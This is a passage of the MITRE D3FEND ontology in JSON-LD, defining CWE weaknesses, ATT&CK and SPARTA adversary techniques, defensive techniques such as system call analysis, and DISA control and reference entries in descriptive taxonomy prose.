      "d3f:cwe-id": "CWE-151",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as comment delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Comment Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:OfficeApplicationFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A document file in a format associated with an d3f:OfficeApplication.",
      "d3f:may-contain": {
        "@id": "d3f:ImageFile"
      },
      "rdfs:label": "Office Application File",
      "rdfs:seeAlso": {
        "@id": "d3f:OfficeApplication"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "_:Nda12cce8da604e2ea50631faef8f824d"
        }
      ]
    },
    {
      "@id": "_:Nda12cce8da604e2ea50631faef8f824d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ImageFile"
      }
    },
    {
      "@id": "d3f:PhysicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-PLM",
      "d3f:definition": "Physical link mapping identifies and models the link connectivity of the network devices within a physical network.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-LibreNMSDocsNetworkMapExtension"
      },
      "d3f:maps": [
        {
          "@id": "d3f:NetworkNode"
        },
        {
          "@id": "d3f:PhysicalLink"
        }
      ],
      "d3f:synonym": "Layer 1 Mapping",
      "rdfs:label": "Physical Link Mapping",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Network_topology#Links"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkMapping"
        },
        {
          "@id": "_:N12f1c2b9d73042e58671c46c70a2addf"
        },
        {
          "@id": "_:N7e956c6b2e9f4128975e8b9cbd32dcc8"
        }
      ]
    },
    {
      "@id": "_:N12f1c2b9d73042e58671c46c70a2addf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "_:N7e956c6b2e9f4128975e8b9cbd32dcc8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "d3f:T1652",
      "@type": "owl:Class",
      "d3f:attack-id": "T1652",
      "d3f:definition": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).",
      "rdfs:label": "Device Driver Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:NetworkCardFirmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Firmware that is installed on a network card (network interface controller).",
      "rdfs:label": "Network Card Firmware",
      "rdfs:seeAlso": {
        "@id": "dbr:Network_interface_controller"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      },
      "skos:altLabel": "Network Controller Firmware"
    },
    {
      "@id": "d3f:MulticlassClassification",
      "@type": "owl:Class",
      "rdfs:label": "Multiclass Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:Classifying"
      }
    },
    {
      "@id": "d3f:SuspendThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Suspending a thread causes the thread to stop executing user-mode code.",
      "d3f:suspends": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Suspend Thread",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Na531ae0138ec48ecb6e1921671b068cd"
        }
      ]
    },
    {
      "@id": "_:Na531ae0138ec48ecb6e1921671b068cd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:suspends"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:OTControlLogicProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:communicates-with": {
        "@id": "d3f:OTIOModule"
      },
      "d3f:contains": {
        "@id": "d3f:OTLogicVariable"
      },
      "d3f:controls": {
        "@id": "d3f:OTActuator"
      },
      "d3f:definition": "The instructions and algorithms within an OT Controller defined by user programming to interpret inputs, process information, and determine outputs.",
      "d3f:monitors": {
        "@id": "d3f:OTSensor"
      },
      "rdfs:label": "OT Control Logic Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplicationProcess"
        },
        {
          "@id": "_:Nc4c7e411782d4be88067b0a5afe496fc"
        },
        {
          "@id": "_:N0972db3008fe4a0a93b00b7eb3b29c19"
        },
        {
          "@id": "_:N65b70d0bd1be40f99cab9c309e0afa21"
        },
        {
          "@id": "_:N051840a9a7214beda6922d81636b364d"
        }
      ]
    },
    {
      "@id": "_:Nc4c7e411782d4be88067b0a5afe496fc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:communicates-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTIOModule"
      }
    },
    {
      "@id": "_:N0972db3008fe4a0a93b00b7eb3b29c19",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "_:N65b70d0bd1be40f99cab9c309e0afa21",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:controls"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTActuator"
      }
    },
    {
      "@id": "_:N051840a9a7214beda6922d81636b364d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSensor"
      }
    },
    {
      "@id": "d3f:LM-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0006",
      "d3f:definition": "During integration and ascent, payloads and the launch vehicle exchange power, discrete lines, and data via umbilicals, separation avionics, and shared EGSE networks. Protections can be reduced or heterogeneous because timelines are tight and responsibilities cross organizations. An attacker positioned on either side (vehicle or payload) can use these commissioning links, health/status queries, time distribution, inhibit lines, separation commands, or telemetry gateways, to inject messages, transfer files, or alter configuration that propagates across the interface. Before fairing close and prior to separation, this brief but high-trust coupling provides a route to move from one platform to the other and to seed artifacts that persist after deployment.",
      "rdfs:label": "Launch Vehicle Interface - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Launch Vehicle Interface"
    },
    {
      "@id": "d3f:Artifact",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A man-made object taken as a whole.",
      "rdfs:label": "Artifact",
      "rdfs:seeAlso": [
        {
          "@id": "http://d3fend.mitre.org/ontologies/d3fend.owl"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00022119-n"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:HardwareDriver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a device driver (commonly referred to simply as a driver) is a computer program that operates or controls a particular type of device that is attached to a computer. A driver provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details of the hardware being used. A driver communicates with the device through the computer bus or communications subsystem to which the hardware connects. When a calling program invokes a routine in the driver, the driver issues commands to the device. Once the device sends data back to the driver, the driver may invoke routines in the original calling program. Drivers are hardware dependent and operating-system-specific. They usually provide the interrupt handling required for any necessary asynchronous time-dependent hardware interface.",
      "d3f:drives": {
        "@id": "d3f:HardwareDevice"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Device_driver"
      },
      "rdfs:label": "Hardware Driver",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N88c8699037d6400ab2bcd09ef90ff414"
        }
      ],
      "skos:altLabel": "Device Driver"
    },
    {
      "@id": "_:N88c8699037d6400ab2bcd09ef90ff414",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:drives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:WindowsNtReadFileScatter",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reads a specified block from a file into multiple buffers. Each buffer must be one page in length.",
      "rdfs:label": "Windows NtReadFileScatter",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadFile"
      }
    },
    {
      "@id": "d3f:T1492",
      "@type": "owl:Class",
      "d3f:attack-id": "T1492",
      "d3f:definition": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1565.001",
      "rdfs:label": "Stored Data Manipulation",
      "rdfs:seeAlso": {
        "@id": "d3f:T1565.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:Reference-ServiceSearchPathInterception_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-07-001/"
      },
      "d3f:kb-abstract": "According to ATT&CK, an adversary may escalate privileges by intercepting the search path for legitimately installed services. As a result, Windows will launch the target executable instead of the desired binary and command line. This can be done when there are spaces in the binary path and the path is unquoted. Search path interception should never happen legitimately and will likely be the result of an adversary abusing a system misconfiguration. With a few regular expressions, it is possible to identify the execution of services with intercepted search paths.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-07-001: Service Search Path Interception",
      "rdfs:label": "Reference - CAR-2014-07-001: Service Search Path Interception - MITRE"
    },
    {
      "@id": "d3f:T1497.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1497.001",
      "d3f:definition": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)",
      "rdfs:label": "System Checks",
      "rdfs:subClassOf": {
        "@id": "d3f:T1497"
      }
    },
    {
      "@id": "d3f:SystemConfigurationPermissions",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemConfigurationPermissions"
      ],
      "d3f:d3fend-id": "D3-SCP",
      "d3f:definition": "Restricting system configuration modifications to a specific user or group of users.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-HowToChangeRegistryValuesOrPermissionsFromACommandLineOrAScript"
      },
      "d3f:restricts": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "System Configuration Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N3396d26c2f6f4f69a2fca2a86777c634"
        }
      ]
    },
    {
      "@id": "_:N3396d26c2f6f4f69a2fca2a86777c634",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CCI-001427_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system allows authorized users to associate security attributes with information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001427"
    },
    {
      "@id": "d3f:T1003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1003",
      "d3f:definition": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.",
      "rdfs:label": "OS Credential Dumping",
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:CommonAttackPattern",
      "@type": "owl:Class",
      "d3f:definition": "A common attack pattern that is in the CAPEC knowledge base.",
      "rdfs:label": "Common Attack Pattern",
      "rdfs:subClassOf": {
        "@id": "d3f:CAPECThing"
      }
    },
    {
      "@id": "d3f:PartialMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PM",
      "d3f:definition": "Partial string pattern matching is a special case of string pattern matching where one seeks to find a pattern within a larger string (text). It allows for the detection of patterns that occur as substrings or partial segments within the full string, rather than requiring an exact match across the entire string.",
      "d3f:kb-article": [
        "## References\n1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm)",
        "Numeric pattern matching is a method of matching some defined pattern specification against a numeric value."
      ],
      "rdfs:label": "Partial Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:StringPatternMatching"
      }
    },
    {
      "@id": "d3f:T1025",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:RemovableMediaDevice"
      },
      "d3f:attack-id": "T1025",
      "d3f:definition": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.",
      "rdfs:label": "Data from Removable Media",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nc97e6771f50449cb85a6a45d86b35c9b"
        }
      ]
    },
    {
      "@id": "_:Nc97e6771f50449cb85a6a45d86b35c9b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:CWE-1280",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1280",
      "d3f:definition": "A product's hardware-based access control check occurs after the asset has been accessed.",
      "rdfs:label": "Access Control Check Implemented After Asset is Accessed",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "d3f:CWE-696"
        }
      ]
    },
    {
      "@id": "d3f:T1137.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:Software"
      },
      "d3f:attack-id": "T1137.006",
      "d3f:definition": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)",
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:modifies": {
        "@id": "d3f:OfficeApplication"
      },
      "rdfs:label": "Add-ins",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:Nc76d3986eff94392b862aa5297daed68"
        },
        {
          "@id": "_:Nfc8c5bae33b24b28ad25a320a992c97b"
        },
        {
          "@id": "_:Ne64b5a8ec3484959956e0843a9b05014"
        }
      ]
    },
    {
      "@id": "_:Nc76d3986eff94392b862aa5297daed68",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "_:Nfc8c5bae33b24b28ad25a320a992c97b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:Ne64b5a8ec3484959956e0843a9b05014",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OfficeApplication"
      }
    },
    {
      "@id": "d3f:BarcodeScannerInputDevice",
      "@type": "owl:Class",
      "d3f:definition": "A barcode reader (or barcode scanner) is an optical scanner that can read printed barcodes, decode the data contained in the barcode and send the data to a computer. Like a flatbed scanner, it consists of a light source, a lens and a light sensor translating optical impulses into electrical signals. Additionally, nearly all barcode readers contain decoder circuitry that can analyze the barcode's image data provided by the sensor and send the barcode's content to the scanner's output port.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Barcode_reader"
      },
      "rdfs:label": "Barcode Scanner Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageScannerInputDevice"
      },
      "skos:altLabel": "Barcode Reader"
    },
    {
      "@id": "d3f:Reference-CyberCommandSystemCYCS",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.mitre.org/research/technology-transfer/technology-licensing/cyber-command-system-cycs"
      },
      "d3f:kb-abstract": "MITRE’s Cyber Command System (CyCS) tool addresses the objective of improved mission assurance in cyberspace by enabling the mapping of mission operations to the network operations that support those missions. This tool provides mission-impact assessment through situational awareness and impact analysis. CyCS addresses mission-assurance challenges for highly distributed enterprise systems of systems through vulnerability, threat, and consequence management.",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalDependencyMapping"
      },
      "d3f:kb-reference-title": "Cyber Command System (CYCS)",
      "rdfs:label": "Reference - Cyber Command System (CYCS)"
    },
    {
      "@id": "d3f:T1488",
      "@type": "owl:Class",
      "d3f:attack-id": "T1488",
      "d3f:definition": "Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1561.001",
      "rdfs:label": "Disk Content Wipe",
      "rdfs:seeAlso": {
        "@id": "d3f:T1561.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:Reference-IntegerRangeValidation_SEI",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://resources.sei.cmu.edu/downloads/secure-coding/assets/sei-cert-c-coding-standard-2016-v01.pdf"
      },
      "d3f:kb-organization": "Software Engineering Institute",
      "d3f:kb-reference-of": {
        "@id": "d3f:IntegerRangeValidation"
      },
      "d3f:kb-reference-title": "SEI CERT C Coding Standard",
      "rdfs:label": "Reference - Integer Range Validation"
    },
    {
      "@id": "d3f:CWE-424",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-424",
      "d3f:definition": "The product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources.",
      "rdfs:label": "Improper Protection of Alternate Path",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-638"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:SMBFileOverwriteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is opened and truncated if it exists, failing if the file does not already exist. This operation is destructive and focuses on replacing the file's contents.",
      "rdfs:label": "SMB File Overwrite Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SMBEvent"
        },
        {
          "@id": "_:Nbdf0889f47834ec9869df378ed5bfc30"
        }
      ]
    },
    {
      "@id": "_:Nbdf0889f47834ec9869df378ed5bfc30",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SMBFileCreateEvent"
      }
    },
    {
      "@id": "d3f:ATTACKICSCollectionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0100"
      },
      "rdfs:label": "Collection Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N3cba61b8b67646e4a6af7fcbdb5313b1"
        }
      ],
      "skos:prefLabel": "Collection Technique"
    },
    {
      "@id": "_:N3cba61b8b67646e4a6af7fcbdb5313b1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0100"
      }
    },
    {
      "@id": "d3f:T1590.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.001",
      "d3f:definition": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.",
      "rdfs:label": "Domain Properties",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:T1519",
      "@type": "owl:Class",
      "d3f:attack-id": "T1519",
      "d3f:definition": "Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at <code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.014",
      "rdfs:label": "Emond",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.014"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-368",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-368",
      "d3f:definition": "A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product's behavior during the switch.",
      "rdfs:label": "Context Switching Race Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:SystemCallAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemCallAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:SystemCall"
      },
      "d3f:d3fend-id": "D3-SCA",
      "d3f:definition": "Analyzing system calls to determine whether a process is exhibiting unauthorized behavior.",
      "d3f:kb-article": "## How it works\n\nSystem calls are APIs between a user application and the operating system [1].\n\nBy analyzing a process's use of these APIs, it is, in some cases, possible to ascertain whether a program is exhibiting unauthorized behavior, including trying to escalate its privileges.\n\n### Gathering System Calls\nA common method to capture system calls is to use kernel APIs to hook [2] a process's system call invocations.\n\nThe Linux system call `ptrace` tracks other system calls in a process and allows their alteration; this is made use of by GDB.  `strace` utilizes `ptrace` and will print to stdout each system call invoked. Other applications record this data in local or remote databases.\n\nThe log entry for each system call, which may reference additional information such as the date and time, and the process tree for the process which made the system call, is relayed, in real time or post-facto, to an analysis module which consults a catalog or model to determine whether the distribution matches a known-good or known-bad pattern.\n\n\n### Analysis\n\nSystem calls are analyzed with a variety of methods. Some analytics look for specific sequences of instructions, others may apply statistical methods to identify abnormal behavior.\nSequences of instructions can be abstracted into conceptually higher order user activities, for example:\n\n* An attacker executes many system calls in a short period of time, with several sequences which could be used to escalate privileges.\n* Getting the contents from a URL, writing to a new file, and then executing the same file.\n* A ransomware program which either uses a loop or creates many threads to: read a specified file, encrypt its contents, create an output file with a similar name to the original file, and delete the unencrypted original.\n\n## Considerations\n\n* Duplicative or extraneous system calls may be added to malware to defeat analytics.\n* Malware could replace API hooking instructions to allow system calls to be made without being monitored.\n* A model built from a training set of system calls and related data may not be updated fast enough to detect new threats.\n\n\n[1] [Syscalls](http://man7.org/linux/man-pages/man2/syscalls.2.html)\n\n[2] [Hooking](http://dbpedia.org/resource/Hooking)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CredentialDumpingViaWindowsTaskManager_MITRE"
        },
        {
          "@id": "d3f:Reference-DLLInjectionViaLoadLibrary_MITRE"
        },
        {
          "@id": "d3f:Reference-DeterministicMethodForDetectingAndBlockingOfExploitsOnInterpretedCode_K2CyberSecurityInc"
        },
        {
          "@id": "d3f:Reference-Hardware-assistedSystemAndMethodForDetectingAndAnalyzingSystemCallsMadeToAnOpertingSystemKernel_EndgameInc"
        },
        {
          "@id": "d3f:Reference-MalwareDetectionInEventLoops_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-PostSandboxMethodsAndSystemsForDetectingAndBlockingZero-dayExploitsViaApiCallValidation_K2CyberSecurityInc"
        },
        {
          "@id": "d3f:Reference-CAR-2020-05-001%3AMiniDumpOfLSASS_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-011%3ACreateRemoteThreadIntoLSASS_MITRE"
        }
      ],
      "rdfs:label": "System Call Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N3fe3e21928104987a340c0983cd28f08"
        }
      ]
    },
    {
      "@id": "_:N3fe3e21928104987a340c0983cd28f08",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:T1500",
      "@type": "owl:Class",
      "d3f:attack-id": "T1500",
      "d3f:definition": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1027.004",
      "rdfs:label": "Compile After Delivery",
      "rdfs:seeAlso": {
        "@id": "d3f:T1027.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CCI-000226_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ExecutionIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability for a privileged administrator to configure organization-defined security policy filters to support different security policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000226"
    },
    {
      "@id": "d3f:T1548.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1548.004",
      "d3f:creates": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:definition": "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate whether the program requesting root privileges comes from a reputable source or has been maliciously modified.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Elevated Execution with Prompt",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:Nf3f485e9b5e14a8590bd4df4bb6bc409"
        },
        {
          "@id": "_:N90efda12122449c08685f4f2b5a8bb21"
        }
      ]
    },
    {
